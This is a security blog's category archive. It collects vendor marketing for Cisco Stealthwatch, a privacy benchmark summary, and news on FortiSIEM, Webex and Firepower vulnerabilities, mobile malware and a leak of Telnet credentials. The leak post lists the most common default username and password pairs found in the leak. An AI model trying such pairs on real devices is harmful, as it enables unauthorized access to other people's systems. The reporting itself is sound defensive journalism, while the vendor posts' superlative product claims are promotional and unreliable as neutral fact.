Category Archives: security

Time for Some Straight Talk Around Network Traffic Analysis

According to research from the Enterprise Strategy Group, 87% of organizations use Network Traffic Analysis (NTA) tools for threat detection and response today, and 43% say that NTA is a “first line of defense” in case of an attack. The increasing IT complexity is one of the main factors in the adoption of NTA tools – growing infrastructure, rise in hybrid and multi cloud deployments, employees accessing the network from any device and any location, and large number of smart devices (IoT/OT) connecting to the network. At the same time, the attack landscape has evolved as well – use of stolen credentials, threats hiding in encrypted traffic, rise in nation-state attacks, and more.

Perhaps that’s why there are so many NTA vendors out there today, trying to catch the attention of security practitioners, carrying their “AI and ML” billboards.

Cisco offers an NTA solution as well, but it wasn’t born yesterday. Cisco Stealthwatch has been in the market more than 17 years. And here are some things that make it the market leading NTA solution:

Broad dataset

Stealthwatch has always relied on network meta data such as NetFlow to feed into its analytics. Now, some vendors claim that this way of ingesting telemetry doesn’t give the complete picture and has limitations. It’s because they rely on deploying a large number of sensors and probes in the network to capture data. If I were cynical, I’d say the vendors who take this position want you to buy more probes and increase your workload!

We realized very early on that as the network grows exponentially, it’s very difficult (and expensive) to deploy sensors everywhere. And this approach leaves you with a lot of blind spots. That’s why we offer an agentless deployment to customers using built in functionality in your network devices. And unlike competitive claims, Stealthwatch doesn’t just rely on NetFlow. For example, it gets user contextual data from Cisco Identity Services Engine (ISE) and also ingests proxy, web, and endpoint data to provide comprehensive visibility. If you do need to investigate the payload, Stealthwatch integrates with major packet capture solutions so you can selectively analyze the malicious traffic pinpointed by Stealthwatch.

Layered analytical approach

Visibility is great, but can be dangerous when it begins to overwhelm your security team. The key is effective analytics to reduce that massive dataset to a few actionable alerts. Stealthwatch uses close to 100 different behavioral models to analyze the telemetry and identify anomalies. These anomalies are further reduced to high-level alerts mapped to the kill-chain such as reconnaissance, command-and-control, data exfiltration and others. Stealthwatch also employs machine learning that uses global threat intelligence powered by Cisco Talos and techniques like supervised and unsupervised learning, statistical modeling, rule mining…I could go on. But I want to talk about the outcomes of analytics within the solution:

  • Stealthwatch processes ~6.7 trillion network sessions each day across ~80 million devices in our customer environments and reduces them to a few critical alerts. In fact, our customers consistently rate more than 90% of the alerts they see in the dashboard as helpful.
  • Stealthwatch can automatically detect and classify devices and their roles on the network so that your security scales automatically with your growing network
  • Another key outcome of Stealthwatch security analytics is the ability to analyze encrypted traffic to detect threats and ensure compliance, without any decryption, using Encrypted Traffic Analytics. With greater than 80% of the web traffic being encrypted1 and more than 70% of threats in 2020 predicted to use encryption2, this is a major attack vector and it’s no longer feasible to rely on decryption-based monitoring
  • And lastly, instead of throwing random metrics like “XX times workload reduction”, we asked our customers how Stealthwatch has helped them in their incident response and 77% agreed that it has reduced the time to detect and remediate threats from months to hours.

Multi cloud visibility

As organizations increasingly adopt the cloud, they need to ensure that their security controls extend to the cloud as well. Stealthwatch is the only network traffic analysis solution that can provide truly cloud-native visibility across all major cloud providers like Amazon Web Services (AWS), Microsoft Azure and Google Cloud Platform (GCP). And again, the deployment is agentless without the need to install multiple sensors across the infrastructure. With a single solution, you get visibility across the entire network infrastructure, on-premises to the cloud.

Integrated platform approach

We have been working on integrating Stealthwatch analytics into our security platform that spans the network, endpoint, applications and cloud. Most recently, we have integrated Stealthwatch with Cisco Threat Response. Stealthwatch sends alerts directly to Cisco Threat Response’s Incident Manager feature, allowing users to see those alerts alongside prioritized security alerts from other products such as Firepower devices. These incidents can then be investigated with additional context from your other threat response-enabled technologies, all in one console, with one click. This lowers the time required to triage and response to these alarms.

Stealthwatch is also integrated with firewall through the Cisco Defense Orchestrator for threat detection and effective policy management.

Try Stealthwatch

Customers, big and small, love and trust Stealthwatch. We count 15 of top 20 US banks, and 14 of top 20 global healthcare companies among our customers. If you would like to try the solution, you can sign up for a free 2-week Stealthwatch visibility assessment at: https://www.cisco.com/go/free-visibility-assessment

Joining us at Cisco Live, Barcelona this week? Here’s a guide to all the activities and key sessions related to Stealthwatch at the event or come check out a Stealthwatch demo within the Security area at World of Solutions.

  1. As of May 2019, 94% of all Google web traffic is encrypted. And nearly 80% of web pages loaded by Firefox use HTTPS
  2. Gartner predicts that more than 70% of malware campaigns in 2020 will use some type of encryption to conceal malware delivery, command-and-control activity, or data exfiltration – Gartner, Predicts 2017: Network and Gateway Security, December 13, 2016

The post Time for Some Straight Talk Around Network Traffic Analysis appeared first on Cisco Blogs.

5 Ways Your Organization Can Ensure Improved Data Security

Each year on January 28, the United States, Canada, Israel and 47 European countries observe Data Privacy Day. The purpose of Data Privacy Day is to inspire dialogue on the importance of online privacy. These discussions also seek to inspire individuals and businesses to take action in an effort to respect privacy, safeguard data and […]… Read More

The post 5 Ways Your Organization Can Ensure Improved Data Security appeared first on The State of Security.

Fortinet removed hardcoded SSH keys and database backdoors from FortiSIEM

The vendor Fortinet has finally released security patches to remove the hardcoded SSH keys in Fortinet SIEM appliances.

Fortinet has finally released security updates to remove the hardcoded SSH keys in Fortinet SIEM appliances.

Recently Andrew Klaus, a security specialist from Cybera, discovered a hardcoded SSH public key in Fortinet’s Security Information and Event Management FortiSIEM that can be used by attackers to the FortiSIEM Supervisor. 

The expert discovered that the Fortinet devices share the same SSH key for the user ‘tunneluser‘, and it is stored in plain text.

“FortiSIEM has a hardcoded SSH public key for user “tunneluser” which is the same between all installs. An attacker with this key can successfully authenticate as this user to the FortiSIEM Supervisor.” reads the security advisory. “The unencrypted key is also stored inside the FortiSIEM image. While the user’s shell is limited to running the /opt/phoenix/phscripts/bin/tunnelshell script, SSH authentication still succeeds.”

Fortinet published a security advisory for the issue that is tracked as CVE-2019-17659.

The vulnerability could be exploited by attackers to trigger a condition of denial of service. 

“A use of hard-coded cryptographic key vulnerability in FortiSIEM may allow a remote unauthenticated attacker to obtain SSH access to the supervisor as the restricted user “tunneluser” by leveraging knowledge of the private key from another installation or a firmware image.” reads the advisory.

The user ‘tunneluser‘ only runs in a restricted shell that lets only that user create tunnel connections from the supervisor to the originating IP.

On January 15, Fortinet released a patch that removed the hardcoded public key in FortiSIEM.

Fortinet urges customers to install the patch for CVE-2019-17659, or restrict the access to FortiSIEM’s “tunneluser” port (19999). Users would upgrade to FortiSIEM version 5.2.7 and above.

Fortinet also addressed another issue in Fortinet’s FortiSIEM, tracked as CVE-2019-16153, that is related to the presence of a hardcoded password in the FortiSIEM database component. The flaw could be exploited by attackers to access the device database via the use of static credentials.

“A hard-coded password vulnerability in the FortiSIEM database component may allow attackers to access the device database via the use of static credentials.” reads the advisory published by Fortinet.

The issue affects FortiSIEM 5.2.5 and below, it could be addressed by upgrade systems to FortiSIEM 5.2.6 or above.

The issue was reported to Fortinet by the independent security researcher Srour Ganoush, “CERT CYBERPROTECT” and “Chris Armstrong from CSCI, Inc.

Pierluigi Paganini

(SecurityAffairs – Fortinet, hacking)

The post Fortinet removed hardcoded SSH keys and database backdoors from FortiSIEM appeared first on Security Affairs.

Cloudy with a Chance of Extremely High Alert Accuracy

You can tell it’s raining by sticking your head out the door; but what’s the likelihood of it stopping in the next hour? What’s the temperature and relative humidity? Suddenly the need for analytics is apparent. Without it, the chance of getting soaked on any given day would dramatically increase.

Analytics makes the world go ‘round. So why shouldn’t it be the same in security? According to our CISO Benchmark Study, only 35% of respondents said it was easy to determine the scope of a compromise, contain it, and remediate it. This is where analytics can come in, helping to turn the tide. Analytics are becoming increasingly critical for security, and when done right, can significantly improve an organization’s risk posture.

With so much at stake, cybersecurity should be seamless, precise, and manageable. Unfortunately, as I elaborated on in my last blog post, that’s not often the case. Organizations have become accustomed to purchasing and using too many security products without having enough people to manage them – resulting in more alerts than can be digested.

Forecast: Advanced Analytics   

We understand the importance of delivering security intelligence that can be easily obtained, understood, and responded to in a timely manner. Seventy-seven percent of our customers say that our industry-leading Network Traffic Analysis (NTA) solution, Cisco Stealthwatch, has reduced their time to detect and remediate threats from months to hours, and has provided a fast return on investment.

Stealthwatch provides enterprise-wide visibility from the private network to the public cloud – including from endpoints and encrypted traffic. It delivers comprehensive situational awareness to help organizations detect, prioritize, and mitigate threats in real time.

Customers Enhance Security with Stealthwatch

The in-depth visibility and robust analytics provided by Stealthwatch translate into high-fidelity alerts, dramatically decreasing the need to manually sift through massive amounts of information to pinpoint a security threat. In fact, our customers consistently rate greater than 90 percent of the alerts they receive from Stealthwatch as “helpful,” meaning they lead to something that definitely needs attention. Minimizing noise and zeroing in on what’s most important is a requirement for effectively protecting today’s complex, modernized environments.

  • According to the Durham County Government, Stealthwatch has increased visibility and detection of internal threats by at least 80% and has reduced incident response time by 90%.
  • According to Dimension Data, Stealthwatch has decreased incident response time by over 100 days.
  • And with Stealthwatch, J. Crew Group can now respond to incidents in 10-15 minutes.

A Platform Approach to Security

Stealthwatch is part of a portfolio of products that work together as a team, learning from each other and improving each other’s effectiveness. For example, Stealthwatch integrates with our incident response portal, Cisco Threat Response, and our security policy management tool, Cisco Defense Orchestrator. We also integrate third-party solutions to deliver more thorough and impactful defenses.

Stealthwatch leverages many aspects of our platform approach to security – including integration, automation, and machine learning – to harden networks and simplify protection. It’s like knowing with confidence what the weather will be like all day and having exactly the right kind of clothes to stay comfortable and dry.

Learn More

If you are joining us this week at Cisco Live in Barcelona, come check out Stealthwatch at one of the sessions or experience a demo within the Security area at the World of Solutions. Or, learn more about Stealthwatch here and take our free 2-week visibility assessment to see how powerful security analytics can quickly surface threats that might be lurking within your network.

The post Cloudy with a Chance of Extremely High Alert Accuracy appeared first on Cisco Blogs.

From Privacy to Trust and ROI

As we embark on a new decade, data privacy has become top-of-mind for business executives and consumers worldwide.  Data breaches frequently expose the personal data of millions, and many companies have not done enough to protect themselves from intentional or unintentional misuse. While it is often hard to reach agreement on new legislation, one issue that governments around the world seem to agree on is the need to help protect the personal data of their constituents. The EU’s General Data Protection Regulation (GDPR) became enforceable in May 2018, and many countries, from China to Brazil, have updated or passed their own regulations. The new California Consumer Privacy Act (CCPA) became effective at the beginning of 2020, other states are following suit, and a U.S. Federal privacy law is now under consideration.

Insights from the Cisco Data Privacy Research Program

The Cisco Chief Privacy Office has provided groundbreaking research and insights to help organizations and consumers understand what they can and should do to keep data safe and maximize their investments in data privacy. Two years ago, we launched our Data Privacy Benchmark Study, which explored privacy maturity and investments across thousands of organizations worldwide. We found that two-thirds of organizations were experiencing significant sales delays due to customer’s data privacy concerns, but that privacy investment was minimizing those delays. Last year, we expanded our inquiry to explore a wide range of business benefits, including the connection between privacy investment and security benefits such as fewer and less costly breaches. In November, we released a companion study looking at the attitudes and behaviors of consumers worldwide.  We identified a large group we call “Privacy Actives” – that is, consumers who care about privacy, are willing to spend time or money to protect their data, and have already switched companies or providers based on their data policies.

The 2020 Data Privacy Benchmark Study and the ROI of Privacy

Today, in observance of International Data Privacy Day, I am pleased to share our 2020 Data Privacy Benchmark Study. Drawing on data from 2800 organizations in 13 countries, we have – for the first time – calculated the ROI for privacy. In addition, we updated the privacy metrics we have been tracking over several years. The study explores the value of privacy certifications in today’s market, as follows:

  • For every dollar spent on privacy, the average organization is getting $2.70 in associated benefits. We asked respondents to quantify their annual privacy investment and business benefits, and we used this to calculate their privacy ROI. Most organizations are seeing very positive returns, and over 40% are realizing at least double their investment.
  • 70% of organizations say they received significant business benefits from privacy beyond compliance. This is up from 40% last year, and includes better agility and innovation, increased competitive advantage, improved attractiveness to investors, and greater customer trust.
  • Higher accountability translates to increased benefits: Companies with higher accountability scores (as assessed using the Accountability Wheel of the Centre for Information Policy Leadership) experience lower breach costs, shorter sales delays, and higher financial returns.
  • Eighty-two percent of organizations see privacy certifications as a motivation for purchasing: Privacy certifications such as the ISO 27701 and the EU-U.S. Privacy Shield are becoming an important purchasing factor when selecting a third-party vendor.

What does this mean for organizations?

The results of this study highlight that privacy is good for business, beyond any compliance requirements. We recommend that organizations:

  • Invest in privacy beyond the legal minimum; most organizations are seeing very positive returns on their privacy spending.
  • Work to obtain external privacy certifications; these have become an important factor in the buying process.
  • Build in privacy accountability and maturity to achieve security benefits, reduced sales delays, and higher returns.

In future blogs, I will explore these results more fully, including some of the interesting differences in results across geographies and company size.

 


More Information

Cisco Data Privacy Benchmark Study 2020

Press Announcement Cisco Data Privacy Benchmark Study 2020 Confirms Positive Financial Benefits of Strong Corporate Data Privacy Practices

Cisco Data Privacy Benchmark Study 2020 – Infographic

Cisco 2019 Data Privacy Benchmark Study

Consumer Privacy Survey

Cisco Data Privacy

Follow Robert on Twitter @RobertWaitman

 

The post From Privacy to Trust and ROI appeared first on Cisco Blogs.

Cisco Webex flaw allows unauthenticated remote attackers to join private meetings

Cisco addressed a vulnerability in Cisco Webex that could be exploited by a remote, unauthenticated attacker to join a protected video conference meeting.

Cisco has addressed a high-severity flaw in the Cisco Webex video conferencing platform (CVE-2020-3142) that could be exploited by a remote, unauthenticated attacker to enter a password-protected video conference meeting.

In order to exploit the CVE-2020-3142 flaw, the attacker only needs to know the meeting ID that once inserted in the Webex mobile application for either iOS or Android will allow him to join the meeting bypassing any authentication.

“A vulnerability in Cisco Webex Meetings Suite sites and Webex Meetings Online sites could allow an unauthenticated, remote attendee to join a password-protected meeting without providing the meeting password. The connection attempt must initiate from a Webex mobile application for either iOS or Android.” reads the security advisory published by Cisco. “An unauthorized attendee could exploit this vulnerability by accessing a known meeting ID or meeting URL from the mobile device’s web browser.”

The CVE-2020-3142 vulnerability has received a CVSS score of 7.5 out of 10, it was discovered while its experts were resolving a Cisco TAC support case.

Fortunately, the presence of the attackers in the meeting is easy to detect because the unauthorized attendees would be visible in the attendee list of the meeting as a mobile attendee. 

The vulnerability affects Cisco Webex Meetings Suite sites and Cisco Meetings Online sites for versions earlier than 39.11.5 (for the former) and 40.1.3 (for the latter).  

Cisco addressed the CVE-2020-3142 vulnerability with the release of the versions 39.11.5 and later and 40.1.3 and later for Webex Meetings Suite sites and Webex Meetings Online sites.

The good news is that the Cisco Product Security Incident Response Team (PSIRT) is not aware of any attack exploiting the vulnerability in the wild.

A couple of weeks ago, Cisco Systems released security fixes for two high-severity vulnerabilities in its products, including a remote code execution flaw in the Webex video conferencing platform.

The Webex flaw addressed by Cisco resides in the web-based management interface of Webex Video Mesh, a feature that enables on-premises infrastructure for video conferencing.

This flaw affects Webex Video Mesh Software releases earlier than 2019.09.19.1956m.

Pierluigi Paganini

(SecurityAffairs – Webex, hacking)

The post Cisco Webex flaw allows unauthenticated remote attackers to join private meetings appeared first on Security Affairs.

This Week in Security News: Trend Micro Creates Factory Honeypot to Trap Malicious Attackers and Microsoft Leaves 250M Customer Service Records Open to the Web

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, dive into a research study that explores the risks associated with common cybersecurity vulnerabilities in a factory setting. Also, read about how misconfigured Microsoft cloud databases containing 14 years of customer support logs exposed 250 million records.

Read on:

Don’t Let the Vulnera-Bullies Win. Use Our Free Tool to See If You Are Patched Against Vulnerability CVE-2020-0601

Last week, Microsoft announced vulnerability CVE-2020-0601 and has already released a patch to protect against any exploits stemming from the vulnerability. Understanding how difficult it can be to patch systems in a timely manner, Trend Micro created a valuable tool that will test endpoints to determine if they have been patched against this latest threat or if they are still vulnerable.

Ransomware, Snooping and Attempted Shutdowns: See What Hackers Did to These Systems Left Unprotected Online

Malicious hackers are targeting factories and industrial environments with a wide variety of malware and cyberattacks including ransomware and cryptocurrency miners. All of these incidents were spotted by researchers at Trend Micro who built a honeypot that mimicked the environment of a real factory. The fake factory featured some common cybersecurity vulnerabilities to make it appealing for hackers to discover and target.

Defend Yourself Now and In the Future Against Mobile Malware

Recently, 42 apps were removed from the Google Play Store after being installed eight million times over the period of a year, flooding victims’ screens with unwanted advertising. Trend Micro blocked more than 86 million mobile threats in 2018, and that number is expected to continue to increase. To learn how to protect your mobile device from hackers, read this blog from Trend Micro.

Trend Micro Joins LOT Network to Fight ‘Patent Trolls’

Trend Micro announced this week that it has joined non-profit community LOT Network in a bid to combat the growing threat posed to its business and its customers by patent assertion entities (PAEs). The community now has more than 500 members, including some of the world’s biggest tech companies such as Amazon, Facebook, Google, Microsoft and Cisco.

Blocking A CurveBall: PoCs Out for Critical Microsoft-NSA Bug CVE-2020-0601

Security researchers have released proof-of-concept (PoC) codes for exploiting CVE-2020-0601, a bug that the National Security Agency (NSA) reported. The vulnerability affects Windows operating systems’ CryptoAPI’s validation of Elliptic Curve Cryptography (ECC) certificates and Public Key Infrastructure (PKI) trust. Enterprises and users are advised to patch their systems immediately to prevent attacks that exploit this security flaw.

Microsoft Leaves 250M Customer Service Records Open to the Web

Misconfigured Microsoft cloud databases containing 14 years of customer support logs exposed 250 million records to the open internet for 25 days. The account information dates back as far as 2005 and as recent as December 2019 and exposes Microsoft customers to phishing and tech scams. Microsoft said it is in the process of notifying affected customers.

Microsoft Releases Advisory on Zero-Day Vulnerability CVE-2020-0674, Workaround Provided

On January 17, Microsoft published an advisory (ADV200001) warning users about CVE-2020-0674, a remote code execution (RCE) vulnerability involving Microsoft’s Internet Explorer (IE) web browser. A patch has not yet been released as of the time of writing — however, Microsoft has acknowledged that it is aware of limited targeted attacks exploiting the flaw.

Google to Apple: Safari’s Privacy Feature Actually Opens iPhone Users to Tracking

Researchers from Google’s Information Security Engineering team have detailed several security issues in the design of Apple’s Safari anti-tracking system, Intelligent Tracking Prevention (ITP). ITP is designed to restrict cookies and is Apple’s answer to online marketers that track users across websites. However, Google researchers argue in a new paper that ITP leaks Safari users’ web browsing habits.

Hacker Publishes Credentials for Over 515,000 Servers, Routers, and IoT Devices

A hacker has published the credentials of over 515,000 servers, routers, and IoT devices on a well-known hacking website. ZDNet reported that the list consists of IP addresses and the usernames and passwords used by each for unlocking Telnet services, the port that allows these devices to be controlled through the internet.

Pwn2Own Miami Contestants Haul in $180K for Hacking ICS Equipment

The first Pwn2Own hacking competition that exclusively focuses on industrial control systems (ICS) has kicked off in Miami. So far, a total of $180,000 has been awarded for pwning five different products. The contest hosts at Trend Micro’s Zero Day initiative (ZDI) have allocated more than $250,000 in cash and prizes for the contest, which is testing eight targets across five categories.

Sextortion Scheme Claims Use of Home Cameras, Demands Bitcoin or Gift Card Payment

A new sextortion scheme has been found preying on victims’ fears through social engineering and follows in the footsteps of recent sextortion schemes demanding payment in bitcoin. Security researchers at Mimecast observed the scheme during the first week of the year. The scheme reportedly sent a total of 1,687 emails on Jan. 2 and 3, mostly to U.S. email account holders.

NetWire RAT Hidden in IMG Files Deployed in BEC Campaign

A recent business email compromise (BEC) campaign, purportedly coming from a small number of scammers in Germany, targets organizations by sending them emails with IMG file attachments hiding a NetWire remote access trojan (RAT). The campaign was discovered by IBM X-Force security researchers and involves sending an employee of the targeted organization an email masquerading as a corporate request.

What are your thoughts on the results of Trend Micro’s factory honeypot study? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Trend Micro Creates Factory Honeypot to Trap Malicious Attackers and Microsoft Leaves 250M Customer Service Records Open to the Web appeared first on .

Ako Ransomware targeting businesses using RaaS

Ako Ransomware targeting businesses using RaaS Quick Heal security researchers recently observed ransomware that uses RaaS (Ransomware as a Service) which is a subpart of MaaS (Malware as a Service). Before delving into the AKO ransomware or RaaS, one must understand what Malware as a Service means, as it is…

Cisco fixes critical issue in Cisco Firepower Management Center

Cisco addressed a critical issue in the Cisco Firepower Management Center (FMC) that could allow a remote attacker to bypass authentication and execute arbitrary actions.

Cisco fixed a critical vulnerability in the Cisco Firepower Management Center that could allow a remote attacker to gain administrative access to the web-based management interface of the vulnerable devices and execute arbitrary actions. The vulnerability tracked as CVE-2019-16028 received a CVSS score of 9.8. 

“A vulnerability in the web-based management interface of Cisco Firepower Management Center (FMC) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device.” reads the security advisory published by Cisco.

“The vulnerability is due to improper handling of Lightweight Directory Access Protocol (LDAP) authentication responses from an external authentication server. An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to gain administrative access to the web-based management interface of the affected device.”

The issue, Cisco stems from the improper handling of Lightweight Directory Access Protocol (LDAP) authentication responses from an external server. The issue could be triggered by sending crafted HTTP requests to a vulnerable device and gain administrative access to the web-based management interface.

Cisco warns that only Cisco Firepower Management Center configured to authenticate users of the web-based management interface through an external LDAP server are affected. 

“To determine whether external authentication using an LDAP server is configured on the device, administrators can navigate to System > Users > External Authentication and look for an External Authentication Object that uses LDAP as the authentication method. The External Authentication Object must be enabled for the FMC to be affected.” continues the advisory.

Cisco released FMC Software versions 6.4.0.7 and 6.5.0.2 to address the flaw, it also announced the release of patches for versions 6.2.3 (6.2.3.16) and 6.3.0 (6.3.0.6) in February and May 2020, respectively. 

The company confirmed that there are no workarounds that address this vulnerability, it also confirmed that this issue does not affect Cisco Adaptive Security Appliance (ASA) Software or Cisco Firepower Threat Defense (FTD) Software.

Cisco is not aware of any attack in the wild exploiting the flaw.

Pierluigi Paganini

(SecurityAffairs – Iran, hacking)

The post Cisco fixes critical issue in Cisco Firepower Management Center appeared first on Security Affairs.

Expert found a hardcoded SSH Key in Fortinet SIEM appliances

Expert found a hardcoded SSH public key in Fortinet ’s Security Information and Event Management FortiSIEM that can allow access to the FortiSIEM Supervisor. 

Andrew Klaus, a security specialist from Cybera, discovered a hardcoded SSH public key in Fortinet’s Security Information and Event Management FortiSIEM that can be used by attackers to the FortiSIEM Supervisor. 

The expert discovered that the Fortinet devices share the same SSH key for the user ‘tunneluser‘, and it is stored in plain text.

FortiSIEM has a hardcoded SSH public key for user “tunneluser” which is the same between all installs. An attacker with this key can successfully authenticate as this user to the FortiSIEM Supervisor.” reads the security advisory. “The unencrypted key is also stored inside the FortiSIEM image. While the user’s shell is limited to running the /opt/phoenix/phscripts/bin/tunnelshell script, SSH authentication still succeeds.”

Fortinet published a security advisory for the issue that is tracked as CVE-2019-17659.

The vulnerability could be exploited by attackers to trigger a confition of denial of service. 

“A use of hard-coded cryptographic key vulnerability in FortiSIEM may allow a remote unauthenticated attacker to obtain SSH access to the supervisor as the restricted user “tunneluser” by leveraging knowledge of the private key from another installation or a firmware image.” reads the advisory.

The user ‘tunneluser‘ only runs in a restricted shell that lets only that user create tunnel connections from the supervisor to the originating IP.

The feature was implemented to enable connecting to collectors from the supervisor when there is a firewall between the collector and the supervisor.

Fortinet invites customers that are not using the reverse tunnel feature to disable SSH on port 19999 that only allows tunneluser to authenticate. Fortinet also advise customers to disable “tunneluser” SSH access on port 22.

Below the timeline of the vulnerability:

  • Dec 2, 2019: Email sent to Fortinet PSIRT with vulnerability details.
  • Dec 3, 2019: Automated reply from PSIRT that email was received.
  • Dec 23, 2019: Sent a reminder email to PSIRT about requesting a human confirmation.
  • Jan 3, 2019: Public Release.

The flaw affects FortiSIEM version 5.2.6 and below, the tech firm addressed it with the release of FortiSIEM version 5.2.7. 

Pierluigi Paganini

(SecurityAffairs – FortiSIEM, hacking)

The post Expert found a hardcoded SSH Key in Fortinet SIEM appliances appeared first on Security Affairs.

Defend Yourself Now and in the Future Against Mobile Malware

The world has gone mobile and the US is leading the way. It’s estimated that that the number of smartphone users alone topped 257 million in the States in 2018. That means three-quarters (74%) of households now boast at least one mobile device. And in this new digital world, it’s mobile applications that really matter. They’re a one-click gateway to our favorite videos, live messaging, email, banking, social media and much more.

There are said to be around 2.8 million of these apps on the official Google Play Store today. But unfortunately, where there are users, there are also hackers looking to capitalize. And one of their favorite ways to make money is by tricking you into downloading a malicious app they’ve sneaked onto the marketplace.

Most recently, 42 such apps had to be removed after being installed eight million times over the period of a year, flooding victims’ screens with unwanted advertising. This is just the tip of the iceberg. As more of us turn to mobile devices as our primary internet gateway, the bad guys will follow suit. Trend Micro blocked over 86 million mobile threats in 2018, and we can expect this figure to increase into the future.

So how can you protect your devices and your data from hackers?

Adware ahoy

The latest bunch of 42 apps are from a class of malicious software known as adware. This follows a previous discovery by Trend Micro earlier this year of a further 85 adware-laden apps downloaded eight million times. Cyber-criminals fraudulently make money by displaying unwanted ads on the victim’s device. In the meantime, the user has to contend with annoying pop-ups which can run down the device’s battery and eat up computing resources. Some even silently gather user information.

Ones to watch

Unfortunately, it’s increasingly difficult to spot malicious apps on the Play Store. A popular tactic for hackers is to hide their malware in titles which impersonate legitimate applications. A recent two-year study found thousands of such counterfeits on the Play Store, exposing users unwittingly to malware. Banking apps are a particularly popular type of title to impersonate as they can provide hackers with highly lucrative log-ins to open users’ accounts.

Some malware, like the recently disclosed Agent Smith threat, works by replacing all the legitimate apps on a user’s device with malicious alter-egos.

So, as we hit 2020, what other threats hidden in legitimate-seeming apps should mobile users be looking out for?

  • More intrusive adware.
  • Cryptocurrency mining malware. This will run in the background, eating up your device battery and computing power. Trend Micro noted a 450% increase in infections from 2017 to 2018.
  • Banking Trojans designed to harvest your log-ins so hackers can get their hands on your savings. Our detections of this malware soared 98% between 2017-18.
  • These attacks have evolved from simple screen lockers to malware designed to encrypt all the files on your device.
  • Premium rate services. Some malware will covertly text or call premium rate SMS numbers under the control of the hacker, thus making them money and costing you potentially significant sums. ExpensiveWall malware, for example, was found in 50 Google Play apps and downloaded millions of times, charging victims’ accounts for fake services.
  • Information theft. Some malware will allow hackers to eavesdrop on your conversations, and/or hoover up your personal data, including phone number, email address, and account log-ins. This data can then be sold on the dark web and used in follow-on identity fraud attempts.

Is Google helping?

The Android ecosystem has always and remains to be a bigger threat than iOS because it’s relatively easier for developers to get their applications onto the official marketplace. Now, it’s true that Google carries out some vetting of the apps on its Play Store and it is getting better and quicker at spotting and blocking malware. It says the number of rejected app submissions grew by over 55% in 2018 while app suspensions increased by over 66%.

However, Google’s Play Protect, which is pre-installed on Android devices, has garnered less than favorable reviews. This anti-malware solution is intended to scan for malicious apps to prevent you downloading them. However, it has received poor reviews for its “terrible malware protection.”

In fact, in independent tests run in July by German organization AV-TEST, Google Play Protect found just 44% of the 3,347 “real-time” online malware threats, and just 55% of the 3,433 malware samples that were collected in the previous month. According to Tom’s Guide, “these scores are all well below the industry averages, which were always 99.5% or above in both categories for all three rounds.”

How do I stay safe?

So how can mobile users ensure their personal data and devices are secure from the growing range of app-based threats?

Consider the following:

  • Only visit official app stores. Even though Google Play has a malware problem, it is more secure than third-party app stores. In fact, you are 23 times more likely to install a potentially harmful application (PHA) outside Play, according to Google.
  • Ensure you’re on the latest operating system version.
  • Do not root your device as this can expose it to threats.
  • Be cautious. If the app is requesting an excessive number of permissions, it may be malicious.
  • Install on-device AV from a reputable third-party provider like Trend Micro.

How Trend Micro Mobile Security helps

Trend Micro Mobile Security (TMMS) offers customers comprehensive anti-malware capabilities via its real-time Security Scan function. Security Scan alerts you to any malware hidden in apps before they are installed and suggests legitimate versions. It can also be manually run on devices to detect and remove malicious apps, including ransomware, that may already have been installed.

To use the manual scan, simply:

1. Tap the Security Scan panel in the TMMS Console. The Security Scan settings screen appears, with the Settings tab active by default.

2. Tap Scan Now to conduct a security scan. The result appears.

3. In the example shown, “Citibank” has been detected as a fake banking app, installed on the device before Mobile Security was installed. Apps are recommended for you to remove or to trust.

4. Tap Uninstall to uninstall the fake app. A Details screen defines the security threats.

5. Tap Uninstall A popup will ask if you want to uninstall the app.

6. Tap Uninstall once more to uninstall it. The app will uninstall.

7. If there are more potentially unwanted apps, tap the panel for Apps Removal Recommended to show the list of apps recommended for removal. The Removal Recommended list will show apps to Remove or Trust.

8. You can configure settings via Security Scan > Settings This will allow you to choose protection strength (Low, Normal, and High).

9. In Settings, check the Pre-Installation Scan, which is disabled by default, to block malware from Google Play before it’s installed. It sets up a virtual private network (VPN) and enables the real-time scan.

Among its other features, Trend Micro Mobile Security also:

  • Blocks dangerous websites from loading in any browsing app with Web Guard
  • Checks if public WiFi connections are safe with Wi-Fi Checker
  • Guards financial and commercial apps with Pay Guard Mobile
  • Optimizes your device’s performance System Tuner and App Manager
  • Protects your kids’ devices with Parental Controls
  • Protects your privacy on social media with Social Network Privacy
  • Provides Lost Device Protection.

To find out more about Trend Micro Mobile Security, go to our Mobile Security Solutions website, where you can also learn about our Mobile Security solution for iOS.

Tags: Mobile Security, Mobile Antivirus, Mobile Antimalware, Android Antivirus

The post Defend Yourself Now and in the Future Against Mobile Malware appeared first on .

The Top 19 Information Security Conferences of 2020

With the 2010s now over, the infosec industry is now fully invested in 2020 and beyond. The 2020s will no doubt present their fair share of challenging digital security threats. But they will also enable security professionals to discuss shared difficulties at conferences and summits. To help promote these collaborative events, we at The State […]… Read More

The post The Top 19 Information Security Conferences of 2020 appeared first on The State of Security.

Bot list with Telnet credentials for more than 500,000 servers and IoT devices leaked online

The availability online of a new collection of Telnet credentials for more than 500,000 servers, routers, and IoT devices made the headlines.

A hacker has published online a massive list of Telnet credentials for more than 515,000 servers and smart devices, including home routers. This is the biggest leak of Telnet passwords even reported.

According to ZDNet that first published the news, the list was leaked on a popular hacking forum by the operator of a DDoS booter service.

The list includes the IP address, username and password for the Telnet service for each device.

The list appears to be the result of an Internet scan for devices using default credentials or easy-to-guess passwords.

“As ZDNet understands, the list was published online by the maintainer of a DDoS-for-hire (DDoS booter) service.” reported ZDNet.

“When asked why he published such a massive list of “bots,” the leaker said he upgraded his DDoS service from working on top of IoT botnets to a new model that relies on renting high-output servers from cloud service providers.”

The lists leaked online are dated October-November 2019, let’s hope that Internet Service Providers will contact ZDNet to receive them and check if the devices belong to their network and secure them.

In August 2017, security researchers Ankit Anubhav found a list of more than 1,700 valid Telnet credentials for IoT devices online

The list of thousands of fully working Telnet credentials was leaked online on Pastebin since June 11, 2017.

Many IoT devices included in the list have default and well-known credentials (i.e., admin:admin, root:root, or no authentication required).

Top five credentials included in the list were:

  • root:[blank]—782
  • admin:admin—634
  • root:root—320
  • admin:default—21
  • default:[blank]—18

